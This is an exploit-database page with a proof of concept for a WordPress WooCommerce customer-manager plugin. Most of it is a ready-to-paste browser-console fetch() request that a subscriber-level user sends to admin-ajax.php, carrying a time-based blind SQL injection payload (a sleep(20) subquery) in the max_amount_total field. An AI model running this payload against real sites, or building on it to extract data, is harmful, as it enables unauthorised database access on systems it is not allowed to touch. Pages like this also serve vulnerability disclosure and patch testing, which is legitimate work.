Share
## https://sploitus.com/exploit?id=WPEX-ID:1550E30C-BF80-48E0-BC51-67D29EBE7272
Run the below command in the developer console of the web browser while being on the blog as a subscriber user and note the 20s delayed response

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wccm_get_orders_tot_num&start_date=2024-01-09&end_date=2024-01-11&min_amount=0&max_amount=0&min_amount_total=0&product_relationship=or&product_category_relationship=or&product_category_filters_relationship=and&statuses=wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft&max_amount_total=(select*from(select(sleep(20)))a)',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));